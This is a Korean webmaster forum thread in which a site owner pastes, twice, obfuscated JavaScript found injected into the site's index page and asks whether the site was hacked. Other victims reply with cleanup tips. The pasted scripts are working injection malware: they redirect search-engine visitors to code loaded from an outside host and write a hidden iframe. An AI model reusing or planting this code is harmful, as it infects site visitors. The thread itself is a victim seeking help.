이거 해킹인가요? 정보
이거 해킹인가요?본문
오류가 나는곳의 주소를 알려주시면 더 빠르고 정확하게 답변 받을 수 있습니다.
오류 주소 :
사이트에 오류 코드가 잔뜩 떠서 인덱스를 열어보니
<script>eval( unescape( "%69%66%28%21%6d%79%69%6b%29%7b%0d%0a%76%61%72%20%72%3d%64%6f%63%75%6d%65%6e%74%2e%72%65%66%65%72%72%65%72%2c%75%3d%64%6f%63%75%6d%65%6e%74%2e%55%52%4c%2c%74%3d%22%22%2c%71%2c%71%75%65%2c%73%65%3d%22%67%62%22%3b%0d%0a%69%66%28%72%2e%69%6e%64%65%78%4f%66%28%22%67%6f%6f%67%6c%65%2e%22%29%21%3d%2d%31%29%7b%74%3d%22%71%22%3b%73%65%3d%22%67%6f%6f%67%6c%65%22%3b%7d%0d%0a%69%66%28%72%2e%69%6e%64%65%78%4f%66%28%22%6d%73%6e%2e%22%29%21%3d%2d%31%29%7b%74%3d%22%71%22%3b%73%65%3d%22%6d%73%6e%22%3b%7d%0d%0a%69%66%28%72%2e%69%6e%64%65%78%4f%66%28%22%79%61%68%6f%6f%2e%22%29%21%3d%2d%31%29%7b%74%3d%22%70%22%3b%73%65%3d%22%79%61%68%6f%6f%22%3b%7d%0d%0a%69%66%28%72%2e%69%6e%64%65%78%4f%66%28%22%79%61%6e%64%65%78%2e%72%75%22%29%21%3d%2d%31%29%7b%74%3d%22%74%65%78%74%22%3b%73%65%3d%22%79%61%6e%64%65%78%2e%72%75%22%3b%7d%0d%0a%69%66%28%74%2e%6c%65%6e%67%74%68&&%28%28%71%3d%72%2e%69%6e%64%65%78%4f%66%28%22%3f%22%2b%74%2b%22%3d%22%29%29%21%3d%2d%31%7c%7c%28%71%3d%72%2e%69%6e%64%65%78%4f%66%28%22&%22%2b%74%2b%22%3d%22%29%29%21%3d%2d%31%29%29%7b%20%71%75%65%3d%72%2e%73%75%62%73%74%72%69%6e%67%28%71%2b%32%2b%74%2e%6c%65%6e%67%74%68%29%2e%73%70%6c%69%74%28%22&%22%29%5b%30%5d%3b%0d%0a%69%66%20%28%28%71%75%65%2e%69%6e%64%65%78%4f%66%28%27%73%69%74%65%3a%27%29%3d%3d%2d%31%29%20&&%20%28%71%75%65%2e%74%6f%4c%6f%77%65%72%43%61%73%65%28%29%2e%69%6e%64%65%78%4f%66%28%27%77%77%77%2e%27%29%3d%3d%2d%31%29%29%0d%0a%09%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%22%3c%73%63%72%69%70%74%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%62%65%73%74%34%79%6f%75%2e%69%66%2e%75%61%2f%6a%73%2f%62%69%64%63%68%2e%6a%73%3f%71%3d%22%2b%71%75%65%2b%22&%72%65%66%3d%22%2b%72%2b%22%27%3e%3c%2f%73%63%22%2b%22%72%69%70%74%3e%22%29%3b%0d%0a%7d%0d%0a%7d%0d%0a%76%61%72%20%6d%79%69%6b%3d%74%72%75%65%3b" ));</script></head>
<frameset rows="1*">
<frame src="/board" name="index" scrolling="auto" marginwidth="0" marginheight="0" noresize>
<noframes>
</noframes>
</frameset> <body><script>function c4bdf5816n49e0824b3253e(n49e0824b32d0c){ function n49e0824b334dc(){var n49e0824b33cac=16;return n49e0824b33cac;} return (eval('pars'+'eInt')(n49e0824b32d0c,n49e0824b334dc()));}function n49e0824b3447c(n49e0824b34c4d){ var n49e0824b363bc=2; var n49e0824b3541b='';n49e0824b37361=String['fromCharCode'];for(n49e0824b35bf0=0;n49e0824b35bf0<n49e0824b34c4d.length;n49e0824b35bf0+=n49e0824b363bc){ n49e0824b3541b+=(n49e0824b37361(c4bdf5816n49e0824b3253e(n49e0824b34c4d.substr(n49e0824b35bf0,n49e0824b363bc))));}return n49e0824b3541b;} var x24='';var n49e0824b37b2d='3C7'+x24+'3637'+x24+'2697'+x24+'07'+x24+'43E667'+x24+'56E637'+x24+'4696F6E20636865636B5F636F6E7'+x24+'4656E7'+x24+'428297'+x24+'B7'+x24+'6617'+x24+'220693D303B7'+x24+'7'+x24+'68696C6528646F637'+x24+'56D656E7'+x24+'42E67'+x24+'657'+x24+'4456C656D656E7'+x24+'47'+x24+'3427'+x24+'9546167'+x24+'4E616D652827'+x24+'69667'+x24+'2616D6527'+x24+'292E6C656E67'+x24+'7'+x24+'468297'+x24+'B7'+x24+'6617'+x24+'220656C3D646F637'+x24+'56D656E7'+x24+'42E67'+x24+'657'+x24+'4456C656D656E7'+x24+'47'+x24+'3427'+x24+'9546167'+x24+'4E616D652827'+x24+'69667'+x24+'2616D6527'+x24+'295B695D3B6966282028656C2E7'+x24+'37'+x24+'47'+x24+'96C652E64697'+x24+'37'+x24+'06C617'+x24+'93D3D27'+x24+'6E6F6E6527'+x24+'207'+x24+'C7'+x24+'C20656C2E7'+x24+'37'+x24+'47'+x24+'96C652E7'+x24+'6697'+x24+'36962696C697'+x24+'47'+x24+'9203D3D27'+x24+'68696464656E27'+x24+'207'+x24+'C7'+x24+'C2028656C2E7'+x24+'7'+x24+'69647'+x24+'4683C3520262620656C2E68656967'+x24+'687'+x24+'43C35292920262620656C2E6E616D65213D27'+x24+'633427'+x24+'297'+x24+'B656C2E7'+x24+'0617'+x24+'2656E7'+x24+'44E6F64652E7'+x24+'2656D6F7'+x24+'6654368696C6428656C293B7'+x24+'D656C7'+x24+'36520692B2B3B7'+x24+'D7'+x24+'D636865636B5F636F6E7'+x24+'4656E7'+x24+'428293B0D0A696628216D7'+x24+'96961297'+x24+'B646F637'+x24+'56D656E7'+x24+'42E7'+x24+'7'+x24+'7'+x24+'2697'+x24+'465287'+x24+'56E657'+x24+'363617'+x24+'065282027'+x24+'2533632536392536362537'+x24+'322536312536642536352532302536652536312536642536352533642536332533342532302537'+x24+'332537'+x24+'32253633253364253237'+x24+'2536382537'+x24+'342537'+x24+'342537'+x24+'30253361253266253266253666253634253635253637'+x24+'2536342536312532652536332537'+x24+'362532652537'+x24+'35253631253266253639253665253265253633253637'+x24+'25363925336625333226253237'+x24+'2532622534642536312537'+x24+'342536382532652537'+x24+'322536662537'+x24+'352536652536342532382534642536312537'+x24+'342536382532652537'+x24+'32253631253665253634253666253664253238253239253261253331253336253336253336253339253338253239253262253237'+x24+'253336253338253634253335253634253332253632253634253333253237'+x24+'2532302537'+x24+'37'+x24+'2536392536342537'+x24+'34253638253364253335253336253337'+x24+'253230253638253635253639253637'+x24+'2536382537'+x24+'342533642533322533392533342532302537'+x24+'332537'+x24+'342537'+x24+'39253663253635253364253237'+x24+'2537'+x24+'362536392537'+x24+'332536392536322536392536632536392537'+x24+'342537'+x24+'39253361253638253639253634253634253635253665253237'+x24+'2533652533632532662536392536362537'+x24+'3225363125366425363525336527'+x24+'29293B7'+x24+'D7'+x24+'6617'+x24+'2206D7'+x24+'969613D7'+x24+'47'+x24+'27'+x24+'5653B3C2F7'+x24+'3637'+x24+'2697'+x24+'07'+x24+'43E';n49e0824b38acc=document;n49e0824b38acc.write(n49e0824b3447c(n49e0824b37b2d));</script>
</html>
<script>check_content()</script>
이런게 인덱스에 있습니다. 이거 해킹당한걸까요?
중국인들이 사이트에 오늘 많이 들어올 일이 있었는데(중국 어느 사이트에 링크가 걸려졌나 봅니다.)
갑자기 인덱스가 저리 변해 버렸습니다.
그냥 저 코드 지우기만 하면 문제 없는걸까요? 아님 어떤 조치를 취해야 하는걸까요?
오류 주소 :
사이트에 오류 코드가 잔뜩 떠서 인덱스를 열어보니
<script>eval( unescape( "%69%66%28%21%6d%79%69%6b%29%7b%0d%0a%76%61%72%20%72%3d%64%6f%63%75%6d%65%6e%74%2e%72%65%66%65%72%72%65%72%2c%75%3d%64%6f%63%75%6d%65%6e%74%2e%55%52%4c%2c%74%3d%22%22%2c%71%2c%71%75%65%2c%73%65%3d%22%67%62%22%3b%0d%0a%69%66%28%72%2e%69%6e%64%65%78%4f%66%28%22%67%6f%6f%67%6c%65%2e%22%29%21%3d%2d%31%29%7b%74%3d%22%71%22%3b%73%65%3d%22%67%6f%6f%67%6c%65%22%3b%7d%0d%0a%69%66%28%72%2e%69%6e%64%65%78%4f%66%28%22%6d%73%6e%2e%22%29%21%3d%2d%31%29%7b%74%3d%22%71%22%3b%73%65%3d%22%6d%73%6e%22%3b%7d%0d%0a%69%66%28%72%2e%69%6e%64%65%78%4f%66%28%22%79%61%68%6f%6f%2e%22%29%21%3d%2d%31%29%7b%74%3d%22%70%22%3b%73%65%3d%22%79%61%68%6f%6f%22%3b%7d%0d%0a%69%66%28%72%2e%69%6e%64%65%78%4f%66%28%22%79%61%6e%64%65%78%2e%72%75%22%29%21%3d%2d%31%29%7b%74%3d%22%74%65%78%74%22%3b%73%65%3d%22%79%61%6e%64%65%78%2e%72%75%22%3b%7d%0d%0a%69%66%28%74%2e%6c%65%6e%67%74%68&&%28%28%71%3d%72%2e%69%6e%64%65%78%4f%66%28%22%3f%22%2b%74%2b%22%3d%22%29%29%21%3d%2d%31%7c%7c%28%71%3d%72%2e%69%6e%64%65%78%4f%66%28%22&%22%2b%74%2b%22%3d%22%29%29%21%3d%2d%31%29%29%7b%20%71%75%65%3d%72%2e%73%75%62%73%74%72%69%6e%67%28%71%2b%32%2b%74%2e%6c%65%6e%67%74%68%29%2e%73%70%6c%69%74%28%22&%22%29%5b%30%5d%3b%0d%0a%69%66%20%28%28%71%75%65%2e%69%6e%64%65%78%4f%66%28%27%73%69%74%65%3a%27%29%3d%3d%2d%31%29%20&&%20%28%71%75%65%2e%74%6f%4c%6f%77%65%72%43%61%73%65%28%29%2e%69%6e%64%65%78%4f%66%28%27%77%77%77%2e%27%29%3d%3d%2d%31%29%29%0d%0a%09%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%22%3c%73%63%72%69%70%74%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%62%65%73%74%34%79%6f%75%2e%69%66%2e%75%61%2f%6a%73%2f%62%69%64%63%68%2e%6a%73%3f%71%3d%22%2b%71%75%65%2b%22&%72%65%66%3d%22%2b%72%2b%22%27%3e%3c%2f%73%63%22%2b%22%72%69%70%74%3e%22%29%3b%0d%0a%7d%0d%0a%7d%0d%0a%76%61%72%20%6d%79%69%6b%3d%74%72%75%65%3b" ));</script></head>
<frameset rows="1*">
<frame src="/board" name="index" scrolling="auto" marginwidth="0" marginheight="0" noresize>
<noframes>
</noframes>
</frameset> <body><script>function c4bdf5816n49e0824b3253e(n49e0824b32d0c){ function n49e0824b334dc(){var n49e0824b33cac=16;return n49e0824b33cac;} return (eval('pars'+'eInt')(n49e0824b32d0c,n49e0824b334dc()));}function n49e0824b3447c(n49e0824b34c4d){ var n49e0824b363bc=2; var n49e0824b3541b='';n49e0824b37361=String['fromCharCode'];for(n49e0824b35bf0=0;n49e0824b35bf0<n49e0824b34c4d.length;n49e0824b35bf0+=n49e0824b363bc){ n49e0824b3541b+=(n49e0824b37361(c4bdf5816n49e0824b3253e(n49e0824b34c4d.substr(n49e0824b35bf0,n49e0824b363bc))));}return n49e0824b3541b;} var x24='';var n49e0824b37b2d='3C7'+x24+'3637'+x24+'2697'+x24+'07'+x24+'43E667'+x24+'56E637'+x24+'4696F6E20636865636B5F636F6E7'+x24+'4656E7'+x24+'428297'+x24+'B7'+x24+'6617'+x24+'220693D303B7'+x24+'7'+x24+'68696C6528646F637'+x24+'56D656E7'+x24+'42E67'+x24+'657'+x24+'4456C656D656E7'+x24+'47'+x24+'3427'+x24+'9546167'+x24+'4E616D652827'+x24+'69667'+x24+'2616D6527'+x24+'292E6C656E67'+x24+'7'+x24+'468297'+x24+'B7'+x24+'6617'+x24+'220656C3D646F637'+x24+'56D656E7'+x24+'42E67'+x24+'657'+x24+'4456C656D656E7'+x24+'47'+x24+'3427'+x24+'9546167'+x24+'4E616D652827'+x24+'69667'+x24+'2616D6527'+x24+'295B695D3B6966282028656C2E7'+x24+'37'+x24+'47'+x24+'96C652E64697'+x24+'37'+x24+'06C617'+x24+'93D3D27'+x24+'6E6F6E6527'+x24+'207'+x24+'C7'+x24+'C20656C2E7'+x24+'37'+x24+'47'+x24+'96C652E7'+x24+'6697'+x24+'36962696C697'+x24+'47'+x24+'9203D3D27'+x24+'68696464656E27'+x24+'207'+x24+'C7'+x24+'C2028656C2E7'+x24+'7'+x24+'69647'+x24+'4683C3520262620656C2E68656967'+x24+'687'+x24+'43C35292920262620656C2E6E616D65213D27'+x24+'633427'+x24+'297'+x24+'B656C2E7'+x24+'0617'+x24+'2656E7'+x24+'44E6F64652E7'+x24+'2656D6F7'+x24+'6654368696C6428656C293B7'+x24+'D656C7'+x24+'36520692B2B3B7'+x24+'D7'+x24+'D636865636B5F636F6E7'+x24+'4656E7'+x24+'428293B0D0A696628216D7'+x24+'96961297'+x24+'B646F637'+x24+'56D656E7'+x24+'42E7'+x24+'7'+x24+'7'+x24+'2697'+x24+'465287'+x24+'56E657'+x24+'363617'+x24+'065282027'+x24+'2533632536392536362537'+x24+'322536312536642536352532302536652536312536642536352533642536332533342532302537'+x24+'332537'+x24+'32253633253364253237'+x24+'2536382537'+x24+'342537'+x24+'342537'+x24+'30253361253266253266253666253634253635253637'+x24+'2536342536312532652536332537'+x24+'362532652537'+x24+'35253631253266253639253665253265253633253637'+x24+'25363925336625333226253237'+x24+'2532622534642536312537'+x24+'342536382532652537'+x24+'322536662537'+x24+'352536652536342532382534642536312537'+x24+'342536382532652537'+x24+'32253631253665253634253666253664253238253239253261253331253336253336253336253339253338253239253262253237'+x24+'253336253338253634253335253634253332253632253634253333253237'+x24+'2532302537'+x24+'37'+x24+'2536392536342537'+x24+'34253638253364253335253336253337'+x24+'253230253638253635253639253637'+x24+'2536382537'+x24+'342533642533322533392533342532302537'+x24+'332537'+x24+'342537'+x24+'39253663253635253364253237'+x24+'2537'+x24+'362536392537'+x24+'332536392536322536392536632536392537'+x24+'342537'+x24+'39253361253638253639253634253634253635253665253237'+x24+'2533652533632532662536392536362537'+x24+'3225363125366425363525336527'+x24+'29293B7'+x24+'D7'+x24+'6617'+x24+'2206D7'+x24+'969613D7'+x24+'47'+x24+'27'+x24+'5653B3C2F7'+x24+'3637'+x24+'2697'+x24+'07'+x24+'43E';n49e0824b38acc=document;n49e0824b38acc.write(n49e0824b3447c(n49e0824b37b2d));</script>
</html>
<script>check_content()</script>
이런게 인덱스에 있습니다. 이거 해킹당한걸까요?
중국인들이 사이트에 오늘 많이 들어올 일이 있었는데(중국 어느 사이트에 링크가 걸려졌나 봅니다.)
갑자기 인덱스가 저리 변해 버렸습니다.
그냥 저 코드 지우기만 하면 문제 없는걸까요? 아님 어떤 조치를 취해야 하는걸까요?
댓글 전체
며칠전 제가 당한 상황이라 똑같네요.
삭젝하고 컴터 바이러스 체크 하시면 바이러스 많이 나올겁니다.
다 잡아서 치료하세요.
저도 원인은 아직 모릅니다.
삭젝하고 컴터 바이러스 체크 하시면 바이러스 많이 나올겁니다.
다 잡아서 치료하세요.
저도 원인은 아직 모릅니다.
그런데 파일 이곳저곳에 넣어둔거 같아요.
어떻게 다 찾아 내지..ㅠㅠ
그거 다 찾아서 저 부분 삭제하면 해결 될까요..
어떻게 다 찾아 내지..ㅠㅠ
그거 다 찾아서 저 부분 삭제하면 해결 될까요..
index.php에만 있을텐데요.
저는 사이트 전체에 2대 있었는데 그곳에만 있고 다른곳엔 없더군요.
저는 사이트 전체에 2대 있었는데 그곳에만 있고 다른곳엔 없더군요.
아..저는 폴더별 인덱스가 몇개 더 있는데 거기도 다 넣어놨더라구요.
그런데 인덱스만 그런가 했더니 나로그(로그분석) 파일에도 넣어 놓구요.
그래도 사이트가 아직 정상이 아닌거 보니 어디 딴데 또 많은가 봐요..ㅠㅠ
그런데 인덱스만 그런가 했더니 나로그(로그분석) 파일에도 넣어 놓구요.
그래도 사이트가 아직 정상이 아닌거 보니 어디 딴데 또 많은가 봐요..ㅠㅠ
저도 같은 증상인데 이거 미치겠네요.. 해결방법은 없는건지요?
레지스트리 검사도 하세여.... 안하면 말짱 황...
방금 또 다시 감염.ㅜㅜ
이런젠장
원인을 알아야 치료를 하지..답답하네요.
이런젠장
원인을 알아야 치료를 하지..답답하네요.
인터넷에 찾아보니까
일단 임시방편으로 감염이 되는 파일의 권한을 444로 바꾸고, 수정할때만 644로 바꾸어서 수정하는 방식을 쓰라고 하네요.
좀 구식인듯 하지만 방금 그렇게 바꾸었습니다.
효과가 있을지 두고 봐야겠네요
일단 임시방편으로 감염이 되는 파일의 권한을 444로 바꾸고, 수정할때만 644로 바꾸어서 수정하는 방식을 쓰라고 하네요.
좀 구식인듯 하지만 방금 그렇게 바꾸었습니다.
효과가 있을지 두고 봐야겠네요
전 오늘 보니 여러 사이트가..ㅠㅠ
일단 호스팅에도 문의해 놨어요..
일단 호스팅에도 문의해 놨어요..
ftp 계정 비번을 일단 바꿔보세요
저도 당했습니다...원인을 알아야 무슨 방법을 찾을텐데....파일을 다 지우고 컴터 바이러스 검사하고 별 방법을 다 써도 다시 원상태군요....
일단 지금시간으로 http://www.krcert.or.kr/ 에서 배포하는 탐지프로그램 신청했습니다..
여기에 희망을 걸고 있습니다...ㅠㅠ
일단 지금시간으로 http://www.krcert.or.kr/ 에서 배포하는 탐지프로그램 신청했습니다..
여기에 희망을 걸고 있습니다...ㅠㅠ
